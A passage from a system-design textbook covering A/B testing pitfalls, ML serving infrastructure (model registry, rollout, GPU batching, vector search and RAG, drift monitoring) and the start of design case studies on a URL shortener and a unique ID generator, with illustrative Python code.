Three failure modes are worth naming because they recur. Peeking: checking results continuously and stopping at the first significant reading inflates the false-positive rate far above the nominal 5% — fix it with a pre-computed sample size, or use sequential testing designed for continuous monitoring. Sample ratio mismatch: if a 50/50 split delivers 50.4/49.6 on millions of users, something in assignment, logging, or filtering is broken and the result is untrustworthy regardless of how good it looks; SRM should be an automatic, blocking check. Multiple comparisons: testing twenty metrics guarantees one "significant" result by chance, which is why a single primary metric is declared in advance and the rest are treated as diagnostics.
Key Takeaways
- Assignment must be deterministic, sticky, and salted per experiment so experiments stay independent.
- Match the randomization unit to where the effect occurs; use cluster randomization when treated and untreated users interact.
- Compute the required sample size before launch — if traffic cannot detect the effect, the experiment cannot answer the question.
- Run an A/A test to validate the pipeline, and make sample-ratio mismatch a blocking check.
- Declare one primary metric in advance and always evaluate guardrails (latency, errors, revenue) alongside it.
- Peeking inflates false positives; ramp for safety, but analyse at the planned sample size.
🧪 Practice
- Implement bucketing for a 3-arm experiment with 10/10/80 traffic and verify the distribution empirically.
- Compute the sample size needed to detect a 2% relative lift on a 4% baseline conversion rate, then state how many days your traffic would need.
- Interview: A 50/50 experiment shows 51.2% of users in treatment. Do you trust the results? (Hint: think about how large that deviation is relative to random variation at your sample size, and what kinds of bugs produce a one-sided loss of units.)
<a id="144-ml-and-ai-serving-systems"></a>
14.4 ML and AI Serving Systems
A trained model is not a product; the infrastructure that runs it under a latency budget, ships new versions safely, and notices when it quietly stops working is. This subchapter covers how training and inference infrastructure differ, when to precompute predictions versus serve them live, how models are versioned and rolled out, how expensive accelerators are scheduled and batched, the retrieval pipelines behind vector search and RAG, and the monitoring that catches degradation nobody reported.
Model Training vs. Inference Infrastructure
Training and inference are both "running a model", which hides the fact that they are almost opposite workloads. Training is a batch job: it consumes an entire dataset repeatedly, runs for hours or weeks, saturates hardware deliberately, and can be restarted from a checkpoint if a machine dies. Inference is an online service: it handles one small request at a time, has a latency SLO, scales with traffic rather than data, and every failure is user-visible. Designing one infrastructure for both produces a system that is bad at each.
The differences propagate into every operational choice. Training benefits from the cheapest possible capacity — spot or preemptible instances — because checkpointing makes interruption survivable; inference cannot use interruptible capacity for its baseline. Training scales by adding accelerators to one job with data or model parallelism; inference scales by adding independent replicas behind a load balancer, which is an ordinary stateless-service problem (4.x). Training failures cost time; inference failures cost requests.
TRAINING INFERENCE
full dataset (TB) one request (KB)
| |
[ distributed job, N accelerators ] [ replica pool, autoscaled by RPS ]
| checkpoint every N steps | p99 latency SLO
v v
model artifact + metrics prediction (ms)
optimise for: throughput, cost optimise for: tail latency, availability
hardware: many accelerators, hardware: right-sized accelerator or CPU,
interruptible OK always-on, no preemption
failure: resume from checkpoint failure: shed load, fall back, degrade
data: sequential bulk reads data: point lookups (feature store)
The critical shared artefact is the model registry: a versioned store holding each model binary alongside the metadata that makes it deployable and auditable — training data snapshot, code commit, hyperparameters, evaluation metrics, and approval stage. Without it, "which model is in production and what was it trained on?" becomes unanswerable, which makes both rollback and incident analysis impossible.
from dataclasses import dataclass, field
from datetime import datetime
@dataclass
class ModelVersion:
name: str
version: str
artifact_uri: str
framework: str
training_data_snapshot: str # exact table version / date range
code_commit: str # reproducibility: what produced this
metrics: dict[str, float]
stage: str = "staging" # staging -> production -> archived
created_at: datetime = field(default_factory=datetime.utcnow)
class Registry:
def __init__(self, gates: dict[str, float]):
self.versions: list[ModelVersion] = []
self.gates = gates # minimum metrics required for production
def promote(self, mv: ModelVersion) -> str:
failed = [m for m, threshold in self.gates.items()
if mv.metrics.get(m, 0.0) < threshold]
if failed:
return f"blocked: {failed} below gate" # never promote by hand
for other in self.versions: # exactly one production
if other.name == mv.name and other.stage == "production":
other.stage = "archived" # keep it: rollback target
mv.stage = "production"
self.versions.append(mv)
return f"{mv.name}:{mv.version} promoted"
reg = Registry(gates={"auc": 0.78, "calibration_error": -0.05})
print(reg.promote(ModelVersion(
name="ranker", version="4.2.0", artifact_uri="s3://models/ranker/4.2.0",
framework="xgboost", training_data_snapshot="events@2026-08-25",
code_commit="9f3ac21", metrics={"auc": 0.81, "calibration_error": -0.01})))
Between the two sits the training pipeline, which should be as automated as a deployment pipeline: assemble the dataset with point-in-time correct features (14.3.4), train, evaluate against a frozen holdout and against the current production model, register the artifact, and gate promotion on the evaluation. Reproducibility is the property that makes all of this debuggable — pin data snapshots, code commits, and random seeds, because "retrain and see" is not an incident response if each retrain produces a different model.
Key Takeaways
- Training is a throughput-optimised batch job; inference is a latency-optimised online service — do not build one system for both.
- Training tolerates preemptible capacity thanks to checkpointing; inference baselines cannot.
- Training scales by parallelising one job; inference scales by adding stateless replicas.
- A model registry with data snapshot, code commit, metrics, and stage is what makes rollback and audit possible.
- Automate the training pipeline and gate promotion on evaluation, never on manual judgement.
- Pin data, code, and seeds: without reproducibility, debugging a model is guesswork.
🧪 Practice
- List the metadata you would store for each model version so a two-month-old prediction could be explained.
- Design capacity for a training job on preemptible instances: checkpoint interval, expected restart cost, and the break-even against on-demand.
- Interview: A model performed well last quarter and worse now, with no code change. How do you investigate? (Hint: think about what else feeding the model has changed, and what you would need to have recorded to prove it.)
Online vs. Offline Inference
Not every prediction needs to be computed while a user waits. The choice between online (synchronous, on the request path) and offline (batch, precomputed and stored) inference is the single largest lever on cost and latency in an ML system, and it is decided by two questions: does the input exist only at request time, and how many of the possible predictions will actually be read?
Offline inference precomputes predictions on a schedule and writes them to a key-value store; serving is then a lookup, costing a millisecond and no accelerator. It is the right answer when inputs change slowly and the prediction space is enumerable — daily churn scores per customer, nightly recommendation slates, precomputed embeddings. Its limits are freshness (a prediction is as old as the last run) and waste (you pay to score every entity, including the 95% that are never requested).
Online inference computes at request time. It is required whenever the input includes something only known then — the query text, the current cart, the uploaded image — or when the prediction space is effectively infinite. The cost is that model execution now sits inside the latency budget and must be capacity-planned for peak traffic.
DECIDING
Does the input exist before the request?
| |
no yes
| |
ONLINE Is the prediction space small enough to enumerate?
| |
yes no
| |
How fresh must it be? ONLINE
| |
hours seconds
| |
OFFLINE STREAMING/NEAR-LINE
(recompute on the triggering event)
COST SHAPE
offline: entities x cost_per_score, paid regardless of reads
online: requests x cost_per_score, paid only for what is used
def compare_strategies(entities: int, requests_per_day: int,
cost_per_score_ms: float = 8.0,
accel_cost_per_hour: float = 3.0):
"""Which is cheaper depends entirely on the read/entity ratio."""
ms_per_hour = 3_600_000
offline_ms = entities * cost_per_score_ms # score everyone, daily
online_ms = requests_per_day * cost_per_score_ms # score only what is asked
fmt = lambda ms: (ms / ms_per_hour) * accel_cost_per_hour
return {
"offline_$/day": round(fmt(offline_ms), 2),
"online_$/day": round(fmt(online_ms), 2),
"coverage": f"{min(requests_per_day / entities, 1):.1%} of entities read",
}
print(compare_strategies(entities=50_000_000, requests_per_day=2_000_000))
# {'offline_$/day': 333.33, 'online_$/day': 13.33, 'coverage': '4.0%'}
# Precomputing 50M scores to serve 2M reads wastes 96% of the compute.
print(compare_strategies(entities=100_000, requests_per_day=40_000_000))
# {'offline_$/day': 0.67, 'online_$/day': 266.67, 'coverage': '100.0%'}
# Here precomputation is ~400x cheaper, and it also removes the latency.
Two hybrids cover most real systems. Near-line (streaming) inference recomputes a prediction when a triggering event arrives rather than on a fixed schedule — the user's slate is refreshed seconds after they add an item to the cart — giving most of offline's cheapness with much of online's freshness. Cache-augmented online inference serves live but caches by a normalized input key; for workloads with repeated inputs (popular queries, identical prompts) a cache hit rate of 40-60% is common and directly halves accelerator spend, provided the cache key includes every input that changes the output, model version included.
Batch inference also has its own operational shape: it is a data pipeline, so it needs the same treatment as 14.1.4 — idempotent writes, partitioned outputs, a freshness SLA, and a quality gate before the new predictions replace the old ones. A silently failed nightly scoring job that leaves yesterday's predictions in place is easy to miss for weeks.
Key Takeaways
- Offline inference precomputes and turns serving into a lookup; online computes per request and is required when the input exists only then.
- The cost comparison hinges on how many precomputed predictions are actually read.
- Near-line inference — recompute on a triggering event — captures most of both benefits.
- Cache online predictions by a normalized key that includes the model version.
- Treat batch inference as a data pipeline: idempotent, partitioned, monitored for freshness.
🧪 Practice
- For three predictions in a product you know, decide online or offline and justify each with the input-availability and coverage tests.
- Compute the daily cost of both strategies for 5M entities and 300k daily requests at 15 ms per score.
- Interview: Precomputed recommendations for 100M users are getting expensive and 90% are never seen. What do you change? (Hint: think about who actually shows up, and what you could compute on their arrival instead.)
Model Versioning and Rollout
A model is a deployable artefact, so everything from 12.3 applies — but with an extra hazard: a bad model does not crash. It returns confident, well-formed, worse predictions. Error-rate and latency dashboards stay green while the product quietly degrades, which is why model rollout needs quality signals in the release gate, not just health checks.
Versioning must therefore cover more than the binary. A model version is the tuple (weights, feature definitions, preprocessing code, and the contract of its input/output schema). Ship the preprocessing with the model — the classic production failure is deploying new weights against the old feature transformation and getting garbage from two individually correct components.
ROLLOUT LADDER FOR MODELS
1. SHADOW real traffic -> both models; only the old model's output is used.
Measures latency and prediction distribution with zero user risk.
Cannot measure business impact: nobody saw the new predictions.
|
2. CANARY 1-5% of traffic served by the new model. Watch guardrails
(latency, errors) AND quality proxies (CTR, conversion).
|
3. A/B TEST 50/50 with a declared primary metric (14.3.6). This is the only
stage that proves the model is BETTER, not merely not worse.
|
4. RAMP 50% -> 100%, previous version kept warm and registered.
|
5. ROLLBACK a config change pointing at the previous version. Seconds,
not a redeploy — the old artifact never left the registry.
class ModelRouter:
"""Serve multiple model versions behind one endpoint. Rollback is a
weight change, not a deployment."""
def __init__(self, models: dict[str, object], weights: dict[str, float],
shadow: str | None = None):
self.models, self.weights, self.shadow = models, weights, shadow
def predict(self, request, unit_id: str):
version = assign_weighted(unit_id, self.weights) # sticky per user
result = self.models[version].predict(request)
if self.shadow:
# Fire-and-forget: never let the shadow model affect the response
# path, its latency, or its failure modes.
try:
shadow_out = self.models[self.shadow].predict(request)
log_shadow(request_id=request.id, live=result,
shadow=shadow_out, shadow_version=self.shadow)
except Exception:
pass # shadow never fails live
log_prediction(request.id, version, result) # for later evaluation
return result, version
def assign_weighted(unit_id: str, weights: dict[str, float]) -> str:
import hashlib
h = int(hashlib.sha256(unit_id.encode()).hexdigest()[:16], 16) / 2 ** 64
acc = 0.0
for version, w in weights.items():
acc += w
if h < acc:
return version
return next(iter(weights))
Logging every prediction with its model version and input features is what makes all later analysis possible: attributing a metric change to a version, building the next training set from real traffic, and debugging a specific bad output. Without version-tagged prediction logs, a quality regression is undiagnosable.
Two model-specific rollout concerns deserve care. Sticky assignment matters more than for ordinary deployments, because a user flipping between two rankers sees results that reorder inexplicably between page loads. And retraining is a release: an automated retrain that promotes itself without the ladder above is a direct path to production from a data pipeline, which means any upstream data bug ships straight to users. Automate retraining freely; automate promotion only behind the same gates a human would apply.
Key Takeaways
- A bad model degrades quality without raising errors — release gates need quality signals, not just health checks.
- Version the whole bundle: weights, preprocessing, feature definitions, and schema contract.
- Shadow measures safety, canary limits blast radius, A/B proves improvement.
- Keep every version in the registry so rollback is a routing weight change, not a redeploy.
- Log predictions with model version and features: it is the basis of attribution, debugging, and future training sets.
- Automate retraining, but gate promotion — otherwise upstream data bugs ship themselves.
🧪 Practice
- Define the promotion gates for a fraud model, including quality thresholds and the guardrails that must not regress.
- Design a shadow deployment and list the comparisons you would compute between live and shadow outputs.
- Interview: A new model has better offline metrics but conversion drops in the canary. What do you check? (Hint: think about what the offline holdout could not contain, and about the components deployed alongside the weights.)
GPU Scheduling and Batching
Accelerators change the economics of serving. A GPU is expensive, cannot be oversubscribed the way CPUs can, and — critically — is dramatically more efficient on batched work than on single requests, because its throughput comes from parallel execution units that a batch of one leaves idle. Serving one request at a time on a GPU is like running a freight train with a single parcel: the trip costs the same either way.
Dynamic batching is the standard response: the server holds incoming requests in a queue for a short window and executes them as one batch. This trades a small, bounded latency increase for a large throughput gain, and the tuning is a direct latency/throughput trade — the maximum wait must come out of the latency budget (13.1.1), and the maximum batch size is bounded by accelerator memory.
import asyncio, time
class DynamicBatcher:
"""Accumulate requests up to max_batch or max_wait_ms, whichever first."""
def __init__(self, model, max_batch: int = 32, max_wait_ms: float = 10):
self.model, self.max_batch, self.max_wait = model, max_batch, max_wait_ms
self.queue: list[tuple] = []
self.lock = asyncio.Lock()
async def predict(self, x):
fut = asyncio.get_event_loop().create_future()
async with self.lock:
self.queue.append((x, fut))
first_in_batch = len(self.queue) == 1
full = len(self.queue) >= self.max_batch
if full:
await self._flush() # do not wait: batch is full
elif first_in_batch:
asyncio.get_event_loop().call_later( # start the window timer
self.max_wait / 1000, lambda: asyncio.ensure_future(self._flush()))
return await fut
async def _flush(self):
async with self.lock:
batch, self.queue = self.queue, []
if not batch:
return
outputs = self.model.predict_batch([x for x, _ in batch]) # one GPU call
for (_, fut), out in zip(batch, outputs):
if not fut.done():
fut.set_result(out)
def throughput(batch_size: int, fixed_ms: float = 6.0, per_item_ms: float = 0.4):
"""Batch cost = fixed overhead + marginal per-item cost. The fixed part is
why batching pays: it is amortised across the whole batch."""
latency = fixed_ms + per_item_ms * batch_size
return {"batch": batch_size, "batch_latency_ms": round(latency, 1),
"rps": round(batch_size / latency * 1000)}
for b in (1, 8, 32, 128):
print(throughput(b))
# {'batch': 1, 'batch_latency_ms': 6.4, 'rps': 156}
# {'batch': 8, 'batch_latency_ms': 9.2, 'rps': 870}
# {'batch': 32, 'batch_latency_ms': 18.8, 'rps': 1702}
# {'batch': 128, 'batch_latency_ms': 57.2, 'rps': 2238}
# 11x the throughput for 3x the latency at batch 32 — then diminishing returns.
Utilization is the other half. A dedicated GPU per model wastes capacity whenever that model is idle, so serving platforms multiplex: several models share one accelerator via MPS or time slicing, MIG partitions a large GPU into isolated slices with guaranteed memory, and Kubernetes device plugins expose accelerators as schedulable resources. Model size relative to accelerator memory is what determines which of these is possible.
SERVING CLUSTER
requests --> [ router: model name -> pool ]
| | |
+-----v----+ +-----v----+ +-----v----+
| GPU node | | GPU node | | GPU node |
| A: rank | | A: rank | | B: embed | <- pools sized separately
| (batched)| | (batched)| | (batched)| per model's traffic
+----------+ +----------+ +----------+
QUEUEING: accelerator pools run at HIGH utilisation by design, and 13.1.4
says queue delay explodes near saturation. Therefore:
- admission control: reject beyond a queue depth rather than queue forever
- a request deadline: drop work whose caller has already timed out
- separate queues per priority so interactive traffic is not stuck behind
a bulk backfill
Three further techniques cut cost substantially and are worth knowing by name. Quantization (fp16, int8, and lower) shrinks weights and speeds execution for a small accuracy cost — usually the highest return per unit of effort. Distillation trains a small model to imitate a large one, useful when the large model is affordable offline but not online. Compilation to an optimized runtime (TensorRT, ONNX Runtime, torch.compile) fuses operations and often yields 2-4x with no modelling change. For autoregressive text models, continuous batching goes further than static dynamic batching: because each sequence finishes at a different step, the server admits new sequences into the batch as slots free up rather than waiting for the whole batch to complete, which is what makes high-throughput LLM serving practical alongside KV-cache reuse.
Finally, autoscaling accelerators is slower and coarser than autoscaling CPU pods: instances are scarce, expensive, and take minutes to become ready. Scale on queue depth or batch-fill rate rather than on GPU utilization alone, keep a warm buffer sized to your scale-up time, and put non-urgent work (batch scoring, evaluation runs) on preemptible capacity that can be displaced by interactive traffic.
Key Takeaways
- Accelerators are throughput devices: unbatched serving wastes most of their capacity.
- Dynamic batching trades a bounded wait for large throughput gains; the wait must fit the latency budget.
- Batch cost is fixed overhead plus marginal per-item cost — the fixed part is what batching amortises, with diminishing returns past a point.
- Multiplex models onto accelerators (MPS, MIG, device plugins) instead of dedicating one per model.
- High utilization means queueing: use admission control, deadlines, and priority queues.
- Quantization, distillation, and compilation often beat buying more hardware; continuous batching is what makes LLM serving efficient.
🧪 Practice
- Given a 40 ms budget and a model at 6 ms fixed plus 0.4 ms per item, find the largest batch size and wait window that fits.
- Design admission control for an inference service: queue depth limit, deadline handling, and what the client sees on rejection.
- Interview: GPU utilization reads 30% but latency is high. What is happening? (Hint: think about what a utilization metric measures during a kernel versus between kernels, and where requests might be spending their time instead.)
Vector Search and Retrieval Pipelines
Keyword matching fails on meaning: "how do I cancel my plan" should match a document titled "Ending your subscription", which shares no significant terms. Embeddings solve this by mapping text (or images, or audio) into a high-dimensional vector space where semantic similarity becomes geometric proximity. Retrieval then means finding the nearest vectors to a query vector.
Exact nearest-neighbour search over 100 million vectors is a full scan, so production systems use approximate nearest neighbour (ANN) indexes that trade a little recall for orders of magnitude in speed. Two families dominate. HNSW builds a multi-layer navigable graph and searches by greedy descent — excellent recall and latency, memory-hungry, and awkward to update in bulk. IVF clusters vectors and scans only the nearest few clusters — cheaper memory, tunable via how many clusters are probed — and is usually combined with product quantization, which compresses vectors to a few bytes each so that billions fit in RAM.
ANN INDEX STRUCTURES
HNSW (graph) IVF + PQ (clustered + compressed)
layer 2: o------------o centroid A centroid B centroid C
\ / . . . . . . . . .
layer 1: o--o----o--o . q . . . . . . .
\ \ / / ^
layer 0: o-o-o-o-o-o-o <- all query lands nearest A and B ->
vectors, dense links scan ONLY those lists (nprobe=2),
each vector stored as ~16 compressed
search: descend layers, greedy bytes instead of 3072 raw bytes
moves toward the query
recall knob: nprobe (more = slower,
recall knob: efSearch better recall)
import math, random
def cosine(a: list[float], b: list[float]) -> float:
dot = sum(x * y for x, y in zip(a, b))
na = math.sqrt(sum(x * x for x in a)); nb = math.sqrt(sum(y * y for y in b))
return dot / (na * nb + 1e-12)
class IVFIndex:
"""Minimal IVF: assign vectors to centroids, probe only the nearest few."""
def __init__(self, centroids: list[list[float]]):
self.centroids = centroids
self.lists: dict[int, list[tuple[str, list[float]]]] = {
i: [] for i in range(len(centroids))}
def add(self, doc_id: str, vec: list[float]) -> None:
best = max(range(len(self.centroids)),
key=lambda i: cosine(vec, self.centroids[i]))
self.lists[best].append((doc_id, vec))
def search(self, q: list[float], k: int = 5, nprobe: int = 2):
# Probe only the nprobe nearest clusters: this is the approximation.
order = sorted(range(len(self.centroids)),
key=lambda i: -cosine(q, self.centroids[i]))
scanned = [pair for i in order[:nprobe] for pair in self.lists[i]]
ranked = sorted(((cosine(q, v), d) for d, v in scanned), reverse=True)
return ranked[:k], len(scanned)
random.seed(7)
dim = 16
cents = [[random.gauss(0, 1) for _ in range(dim)] for _ in range(8)]
idx = IVFIndex(cents)
for i in range(2000):
idx.add(f"d{i}", [random.gauss(0, 1) for _ in range(dim)])
hits, scanned = idx.search([random.gauss(0, 1) for _ in range(dim)], nprobe=2)
print(f"scanned {scanned} of 2000 vectors -> {[d for _, d in hits]}")
The most common production use is retrieval-augmented generation (RAG): retrieve relevant passages and give them to a language model as context, so answers are grounded in your data rather than in the model's parameters. As a system, RAG is a pipeline whose quality is usually limited by retrieval, not by the model — most disappointing RAG deployments are retrieval problems wearing a generation costume.
RAG PIPELINE
INDEXING (offline)
documents -> chunk (respect structure; overlap ~10-20%)
-> embed (batch on the accelerator)
-> store {vector, text, metadata: source, section, updated_at, acl}
-> reindex when the embedding MODEL changes (vectors are not
comparable across models — this is a full rebuild)
QUERY (online) budget
query -> rewrite/expand ~20 ms
-> hybrid retrieve (ANN + BM25) ~30 ms <- 14.3.2 fusion
-> filter by ACL and freshness ~5 ms <- MUST be enforced
-> re-rank top-50 with a cross-encoder ~60 ms here, not in the
-> assemble context, cite sources ~5 ms prompt
-> generate ~1-3 s
Four engineering decisions carry most of the quality. Chunking: chunks too large dilute the embedding and waste context, too small lose the surrounding meaning; split on document structure with modest overlap rather than at a fixed character count. Hybrid retrieval: pure vector search misses exact identifiers, error codes, and names, so fuse with lexical results (14.3.2). Re-ranking: a cross-encoder that reads query and passage together is far more accurate than embedding similarity and is affordable over 50 candidates. Access control: filter by permissions during retrieval — never rely on instructing the model not to reveal something, because a retrieved passage in the context window is already exposed.
Operationally, treat the vector index like any other index (14.3.1): rebuilding after an embedding-model change is a full reindex into a new collection with an alias swap; freshness needs an update path for changed documents; and evaluation needs a fixed query set with judged relevance so you can tell whether a chunking or model change actually helped.
Key Takeaways
- Embeddings turn semantic similarity into geometric proximity; ANN indexes trade recall for speed to make it scale.
- HNSW favours recall and latency at high memory cost; IVF+PQ favours memory and tunes recall via nprobe.
- RAG quality is usually bounded by retrieval, not generation.
- Chunk on structure with overlap, retrieve hybrid, then re-rank the top candidates with a cross-encoder.
- Enforce access control during retrieval — anything in the context is already disclosed.
- Changing the embedding model invalidates every stored vector: plan a full reindex with an alias swap.
🧪 Practice
- Estimate memory for 50M vectors at 768 dimensions in float32, then with product quantization to 32 bytes per vector.
- Design a chunking strategy for technical documentation with headings, code blocks, and tables, and justify the overlap.
- Interview: A RAG assistant confidently answers with outdated policy text. Where in the pipeline do you look? (Hint: the model can only use what it was given — think about what governs which chunk was retrieved and whether superseded documents were ever removed.)
Monitoring Model Drift
Software fails loudly; models fail quietly. The code is unchanged, latency and error rates are flat, and predictions keep flowing — but the world the model was trained on has moved. A fraud model meets a new attack pattern, a recommender meets a seasonal shift, a pricing model meets a competitor's promotion. Nothing pages anyone. The purpose of drift monitoring is to detect degradation before the business metric does.
Distinguish the two kinds precisely, because they call for different responses. Data drift (covariate shift) means the input distribution changed: a new device type, a new market, a broken upstream feature. Concept drift means the relationship between inputs and the label changed: the same inputs now imply a different outcome. Data drift can be detected immediately from inputs alone; concept drift generally requires labels, which arrive later — sometimes much later.
MONITORING LAYERS, FASTEST TO SLOWEST SIGNAL
1. INPUT / FEATURE MONITORING minutes nulls, ranges, category mix,
PSI vs the training baseline
2. PREDICTION MONITORING minutes score distribution, positive
rate, confidence histogram
3. PROXY / ENGAGEMENT METRICS hours CTR, acceptance, override rate
4. LABEL-BASED PERFORMANCE days-weeks AUC, precision/recall once
ground truth arrives
A drop in 4 that was not preceded by a signal in 1-3 means your monitoring is
blind, not that the model failed suddenly.
import math
def population_stability_index(expected: list[float], actual: list[float],
bins: int = 10) -> float:
"""PSI compares a feature's distribution now against training.
Rules of thumb: <0.1 stable, 0.1-0.25 moderate shift, >0.25 significant."""
lo, hi = min(expected), max(expected)
width = (hi - lo) / bins or 1e-9
def hist(xs):
counts = [0] * bins
for x in xs:
i = min(int((x - lo) / width), bins - 1)
counts[max(i, 0)] += 1
# Floor at a small epsilon: an empty bin would make the log blow up.
return [max(c / len(xs), 1e-6) for c in counts]
e, a = hist(expected), hist(actual)
return sum((ai - ei) * math.log(ai / ei) for ei, ai in zip(e, a))
import random
random.seed(1)
train = [random.gauss(50, 10) for _ in range(10_000)]
same = [random.gauss(50, 10) for _ in range(10_000)]
moved = [random.gauss(58, 12) for _ in range(10_000)]
print(round(population_stability_index(train, same), 3)) # 0.002 -> stable
print(round(population_stability_index(train, moved), 3)) # 0.35 -> investigate
Detection is only useful with a defined response, so drift monitoring should be wired to actions rather than to a dashboard. A feature whose PSI crosses a threshold is often an upstream data bug, not a real-world change — check the pipeline before blaming the world. Sustained drift with declining proxy metrics triggers retraining on recent data. Severe drift, or an input distribution the model never saw, should trigger a fallback: route to a simpler, more robust model or to a rules-based default rather than serving confident nonsense.
Labels deserve their own design. Some arrive naturally with a delay (a chargeback in 30 days, a subscription renewal in a year); some require deliberate collection (human review of a sample); and some are contaminated by the model itself — if the fraud model blocks a transaction, you never learn whether it was fraudulent, which biases every future training set. Reserving a small unaffected holdout, or logging counterfactual slices, is what keeps the label stream honest.
Finally, monitor segments, not just aggregates. Overall AUC can hold steady while performance collapses for a new market, a new device, or a minority class — aggregate metrics hide exactly the failures that matter most for fairness and for growth areas. Set up per-segment tracking for the dimensions you care about before you need it.
Key Takeaways
- Models degrade silently: no errors, no latency change, just worse decisions.
- Data drift shifts inputs and is detectable immediately; concept drift shifts the input-label relationship and usually waits on labels.
- Monitor in layers — inputs, predictions, proxy metrics, then label-based performance — because each is progressively slower.
- PSI and similar distribution tests give a practical, thresholdable signal; check for upstream data bugs before concluding the world changed.
- Define the response in advance: investigate, retrain, or fall back to a simpler model.
- Track per-segment performance; aggregates hide localized collapse.
- Beware label feedback loops — a model that blocks outcomes stops observing them.
🧪 Practice
- Compute PSI for a feature before and after a deliberate distribution shift, and choose an alert threshold you would defend.
- Design the monitoring layers for a credit risk model whose labels arrive 90 days late, naming what you watch in the meantime.
- Interview: A fraud model's precision looks stable but complaints are rising. What could be happening? (Hint: think about which cases you still get labels for once the model starts blocking, and what that does to the metric you are measuring.)
<a id="15-applied-system-design-case-studies"></a>
15. Applied System Design Case Studies
The previous fourteen chapters supplied the parts; this one assembles them under the constraints of concrete products, where every choice has a cost and no design is unambiguously right. Each case study follows the same path — clarify requirements, estimate scale, sketch a design, go deep on the one hard part, and name what the design gives up — because that path is both how real systems get built and how design interviews are assessed. The final subchapter covers communicating a design, which is the skill that determines whether any of the preceding work persuades anyone.
<a id="151-foundational-building-blocks"></a>
15.1 Foundational Building Blocks
These six systems are the primitives that appear inside almost every larger design, which is why they are the most commonly asked and the most reusable. Each is small enough to hold in your head completely, and each has exactly one genuinely hard part — uniqueness, ordering, coordination, replication, eviction, or politeness — that the rest of the design exists to support.
Design a URL Shortener
A URL shortener maps a long URL to a short key and redirects visitors when they request that key. It looks trivial, which is exactly why it is a good first design: the interesting engineering is not in the mapping but in the read/write asymmetry, the key generation, and the fact that a redirect must be fast enough that nobody notices it happened.
Requirements. Functional: create a short link for a URL, optionally with a custom alias and an expiry; redirect a short link to its target; report basic click analytics. Non-functional: redirects must be very fast (p99 under ~50 ms) and highly available — a broken redirect breaks every link ever shared — while link creation can be slower and less available. Links are effectively permanent unless expired, so the store only grows.
Estimates. Assume 100M new links per day and a 100:1 read/write ratio.
writes: 100M/day = ~1,160/s average, ~3,500/s peak (3x)
reads : 10B/day = ~116,000/s average, ~350,000/s peak
storage: 100M/day x 500 bytes x 365 x 5 years = ~91 TB over five years
key space: 7 chars of base62 = 62^7 = 3.5e12 keys -> ~100 years at this rate
cache: top 20% of links serve ~80% of reads -> 20M links x 500 B = ~10 GB/day
hot set; a modest cache tier absorbs almost all read traffic
The estimate immediately shapes the design: this is a read-dominated key-value workload with a tiny value size, so it is a caching and lookup problem, not a database problem.
Key generation is the one real decision. Hashing the URL (MD5/SHA truncated to 7 base62 chars) is stateless but collides, so it needs a read-check-retry loop on write. A counter encoded in base62 is collision-free and compact but makes keys sequential, which leaks volume and lets anyone enumerate every link. The common resolution is a distributed counter (14.x-style ID generation, see the next topic) whose output is passed through a bijective scrambling function, so keys are unguessable without a uniqueness check.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
BASE = len(ALPHABET) # 62
KEY_LEN = 7
SPACE = BASE ** KEY_LEN
def encode(n: int) -> str:
"""Base62-encode an integer, left-padded to a fixed width."""
out = []
for _ in range(KEY_LEN):
n, r = divmod(n, BASE)
out.append(ALPHABET[r])
return "".join(reversed(out))
# Feistel-style bijection: maps counter -> scrambled id with NO collisions,
# so keys look random but uniqueness is still guaranteed by the counter.
KNUTH = 2_654_435_761 # odd multiplier, coprime with SPACE
KNUTH_INV = pow(KNUTH, -1, SPACE) # modular inverse: makes it reversible
def make_key(counter: int) -> str:
return encode((counter * KNUTH) % SPACE)
def counter_from_key(key: str) -> int:
n = 0
for ch in key:
n = n * BASE + ALPHABET.index(ch) # decode base62
return (n * KNUTH_INV) % SPACE # undo the scramble
for c in (1, 2, 3, 1_000_000):
k = make_key(c)
print(f"{c:>9} -> {k} -> {counter_from_key(k)}")
# 1 -> 0000TCE9 style output: consecutive counters look unrelated,
# 2 -> ... yet every key is unique and reversible.
Architecture. Reads dominate, so the redirect path is engineered to avoid the database entirely for hot links.
create: client -> API -> ID service (batched counter ranges)
-> KV store PUT key -> {url, owner, expires_at}
-> cache warm (optional)
redirect: client -> CDN/edge (cacheable 301 for stable links)
-> LB -> stateless redirect service
-> cache (Redis, ~99% hit rate)
-> KV store on miss (DynamoDB/Cassandra, key-partitioned)
<- 302 Location: <long url>
-> click event -> queue -> stream aggregation (14.2.3)
Analytics NEVER blocks the redirect: emit an event and return immediately.
Trade-offs worth stating out loud. A 301 permanent redirect is cacheable by
browsers and the CDN, which minimizes traffic but destroys per-click analytics
and makes a link impossible to retarget; 302 keeps control and analytics at the
cost of every click reaching your infrastructure. Custom aliases require a
uniqueness check on a user-supplied string, which is the only strongly consistent
write in the system. Expiry is best implemented as a TTL plus lazy deletion
rather than a scanning job. And because the key space is public, abuse
(phishing, malware) is a real operational concern: link scanning and takedown
paths are part of the design, not an afterthought.
Key Takeaways
- The workload is extremely read-heavy and value-tiny: cache-first design with a simple partitioned key-value store behind it.
- Key generation must be unique and unguessable; a counter plus a bijective scramble gives both without collision checks.
- Base62 at 7 characters yields 3.5e12 keys — size the key length from the projected write rate.
- 301 maximizes cacheability but forfeits analytics and retargeting; 302 keeps both at the cost of traffic.
- Analytics must be asynchronous — never put a write on the redirect path.
- Custom aliases are the only place needing strong consistency.
🧪 Practice
- Compute the key length required to support 500M new links per day for ten years without exhausting the space.
- Design the custom-alias flow, including how you prevent two users claiming the same alias concurrently.
- Interview: How do you support link expiry and deletion at 10B reads/day without a scanning job? (Hint: think about who discovers the expiry first, and what the read path already has to check anyway.)
Design a Unique ID Generator
Distributed systems constantly need identifiers: order IDs, message IDs, event IDs. A single database's auto-increment column gives uniqueness and ordering but also gives a single point of failure and a hard write ceiling. The design problem is producing IDs that are unique across many machines, generated without coordination on every call, and — usually — roughly sortable by time, because time-sortable IDs make range scans, pagination, and index locality dramatically better.
Requirements. Unique across the fleet, ideally 64 bits (fits a BIGINT,
half the size of a UUID in every index), generated locally with no network call
per ID, and monotonically increasing over time so that "newest first" is a
primary-key sort rather than a secondary index.
The candidate approaches:
| Approach | Coordination | Sortable | Size | Weakness |
|---|---|---|---|---|
| DB auto-increment | Every insert | Yes | 64-bit | Single writer, write ceiling |
| UUIDv4 (random) | None | No | 128-bit | Index fragmentation, size |
| UUIDv7 / ULID | None | Yes | 128-bit | Size; still index-friendly |
